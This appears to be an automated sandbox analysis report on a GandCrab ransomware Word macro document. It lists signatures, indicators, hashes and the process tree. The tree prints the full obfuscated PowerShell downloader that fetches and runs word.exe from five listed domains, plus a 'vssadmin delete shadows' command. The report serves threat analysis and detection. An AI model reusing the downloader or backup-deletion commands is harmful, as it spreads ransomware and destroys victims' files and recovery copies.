Analysis
- max time kernel: 145s
- max time network: 154s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 21-05-2022 00:29

Static task: static1
Behavioral task: behavioral1
- Sample: dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
- Resource: win10v2004-20220414-en
General
- Target: dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
- Size: 78KB
- MD5: fe2d1caa2d52000efcd19ea1ea31d254
- SHA1: 6496aa6a299bc606ee9d058bdf4f0d826a2e4541
- SHA256: dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb
- SHA512: 592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d
Malware Config
Extracted (payload download URLs):
- https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
- http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
- https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
- http://sndtgo.ru/word.exe
- http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe
Extracted:
- Path: C:\JQGGQ-MANUAL.txt
- Family: gandcrab
- URL: http://gandcrabmfe6mnef.onion/4f6ecbe4c8a27fc9
Signatures

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- description: Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process; pid: 564; pid_target: 1732; process: cmd.exe; target process: WINWORD.EXE

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Blocklisted process makes network request (7 IoCs)
Processes:
- flow 4, pid 556, powershell.exe
- flow 5, pid 556, powershell.exe
- flow 9, pid 556, powershell.exe
- flow 10, pid 556, powershell.exe
- flow 13, pid 556, powershell.exe
- flow 15, pid 556, powershell.exe
- flow 17, pid 556, powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
Processes:
- pid 1476, 229.exe
Modifies extensions of user files (5 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
- File renamed C:\Users\Admin\Pictures\ExitUnregister.tif => C:\Users\Admin\Pictures\ExitUnregister.tif.jqggq (229.exe)
- File renamed C:\Users\Admin\Pictures\MeasureSelect.png => C:\Users\Admin\Pictures\MeasureSelect.png.jqggq (229.exe)
- File renamed C:\Users\Admin\Pictures\StopPush.png => C:\Users\Admin\Pictures\StopPush.png.jqggq (229.exe)
- File opened for modification C:\Users\Admin\Pictures\DebugUnlock.tiff (229.exe)
- File renamed C:\Users\Admin\Pictures\DebugUnlock.tiff => C:\Users\Admin\Pictures\DebugUnlock.tiff.jqggq (229.exe)

Drops startup file (2 IoCs)
Processes:
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\JQGGQ-MANUAL.txt (229.exe)
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\c8a2782ac8a27fca11d.lock (229.exe)

Loads dropped DLL (1 IoC)
Processes:
- pid 556, powershell.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
- File opened (read-only) by 229.exe: \??\Y:, \??\G:, \??\K:, \??\P:, \??\U:, \??\V:, \??\W:, \??\A:, \??\B:, \??\L:, \??\M:, \??\N:, \??\R:, \??\T:, \??\X:, \??\E:, \??\I:, \??\J:, \??\O:, \??\Q:, \??\S:, \??\Z:, \??\F:, \??\H:
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
- Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" (229.exe)

Drops file in Program Files directory (28 IoCs)
Processes (all by 229.exe):
- File opened for modification C:\Program Files\ImportDeny.eprtx
- File opened for modification C:\Program Files\PushProtect.eprtx
- File opened for modification C:\Program Files\SearchMove.potm
- File opened for modification C:\Program Files\CompressUnlock.wma
- File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\JQGGQ-MANUAL.txt
- File opened for modification C:\Program Files\BackupTrace.cr2
- File opened for modification C:\Program Files\TestResolve.cr2
- File opened for modification C:\Program Files\SendFormat.jpg
- File opened for modification C:\Program Files\UnblockExit.wps
- File created C:\Program Files (x86)\c8a2782ac8a27fca11d.lock
- File opened for modification C:\Program Files\MoveSend.xht
- File opened for modification C:\Program Files\ApproveExit.ogg
- File opened for modification C:\Program Files\MergeCompress.001
- File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\c8a2782ac8a27fca11d.lock
- File created C:\Program Files\JQGGQ-MANUAL.txt
- File opened for modification C:\Program Files\WatchCompare.jfif
- File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\c8a2782ac8a27fca11d.lock
- File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\c8a2782ac8a27fca11d.lock
- File opened for modification C:\Program Files\SaveGroup.svgz
- File created C:\Program Files (x86)\JQGGQ-MANUAL.txt
- File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\JQGGQ-MANUAL.txt
- File opened for modification C:\Program Files\UnlockCompress.xltm
- File opened for modification C:\Program Files\GrantReset.zip
- File opened for modification C:\Program Files\SubmitRedo.ram
- File opened for modification C:\Program Files\UnblockLimit.ods
- File opened for modification C:\Program Files\WatchUninstall.vst
- File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\JQGGQ-MANUAL.txt
- File created C:\Program Files\c8a2782ac8a27fca11d.lock

Drops file in Windows directory (1 IoC)
Processes:
- File opened for modification C:\Windows\Debug\WIA\wiatrace.log (WINWORD.EXE)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (229.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (229.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (229.exe)

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- pid 740, vssadmin.exe
Modifies Internet Explorer settings
Processes:
- WINWORD.EXE
Modifies registry class (64 IoCs)
Processes:
- WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
- pid 1732, WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
- pid 556, powershell.exe (3 IoCs)
- pid 1476, 229.exe (3 IoCs)

Suspicious use of AdjustPrivilegeToken (8 IoCs)
Processes:
- Token: SeDebugPrivilege; pid 556, powershell.exe
- Token: 33; pid 1708, AUDIODG.EXE
- Token: SeIncBasePriorityPrivilege; pid 1708, AUDIODG.EXE
- Token: 33; pid 1708, AUDIODG.EXE
- Token: SeIncBasePriorityPrivilege; pid 1708, AUDIODG.EXE
- Token: SeBackupPrivilege; pid 1680, vssvc.exe
- Token: SeRestorePrivilege; pid 1680, vssvc.exe
- Token: SeAuditPrivilege; pid 1680, vssvc.exe

Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
- pid 1476, 229.exe

Suspicious use of SendNotifyMessage (1 IoC)
Processes:
- pid 1476, 229.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
- pid 1732, WINWORD.EXE (2 IoCs)

Suspicious use of WriteProcessMemory (24 IoCs)
Processes (each parent/child pair was recorded four times):
- PID 1732 (WINWORD.EXE) wrote to memory of 564 (cmd.exe)
- PID 564 (cmd.exe) wrote to memory of 556 (powershell.exe)
- PID 1732 (WINWORD.EXE) wrote to memory of 1408 (splwow64.exe)
- PID 556 (powershell.exe) wrote to memory of 1476 (229.exe)
- PID 1476 (229.exe) wrote to memory of 1944 (cmd.exe)
- PID 1944 (cmd.exe) wrote to memory of 740 (vssadmin.exe)
Processes (indented by depth in the process tree; path, then command line, then triggered signatures)

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm"
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

    \??\c:\windows\SysWOW64\cmd.exe
    c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

            C:\windows\temp\229.exe
            "C:\windows\temp\229.exe"
            - Executes dropped EXE
            - Modifies extensions of user files
            - Drops startup file
            - Enumerates connected drives
            - Sets desktop wallpaper using registry
            - Drops file in Program Files directory
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory

                C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
                - Suspicious use of WriteProcessMemory

                    C:\Windows\SysWOW64\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    - Interacts with shadow copies

    C:\Windows\splwow64.exe
    C:\Windows\splwow64.exe 12288

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x550
- Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
  Filesize: 4.0MB
  MD5: b1cff93a5ffaa02a482145399dd2ca08
  SHA1: 2f6c2f98ab25544ac4141542e55db167a4b66cd4
  SHA256: 45130fa2ce44505b355def932b862ac2c4c64c760e8a62fe4fafa543caa6b99c
  SHA512: a7e203a702b562ee40aaacacad43553e092c850c2fb3c4cc1020f2cc54236705636b55e4b876e11b5df676c2e6c9721fee31feccffca7f92ef4b128a81ce59e4
- C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
  Filesize: 37KB
  MD5: 4f13d08e827b2e667f511902c02da790
  SHA1: fb951c9bc90b6ab09ff148ca590c61b108c4d9de
  SHA256: 8451b29eb14b901aa9d44fb7dbec865df4a2d6c75b05361ce556a9b99a1d09fb
  SHA512: 72d4ce0990b6f4e66f06e6a7addcaa95903774732f2cec999ffd1e38df683bc889b556f87e21d1c3aa9ab61d412ba4734fa768aea6b898718f66ed199de58b3c
- C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
  Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
- C:\Windows\Temp\229.exe (also recorded as \Windows\Temp\229.exe, identical hashes)
  Filesize: 535KB
  MD5: a76b7140cf6d5c4dc5e0ecff23fc2ce0
  SHA1: b312fef877f8eae6ca473a969f30bc85d907f7e3
  SHA256: 3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972
  SHA512: 6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1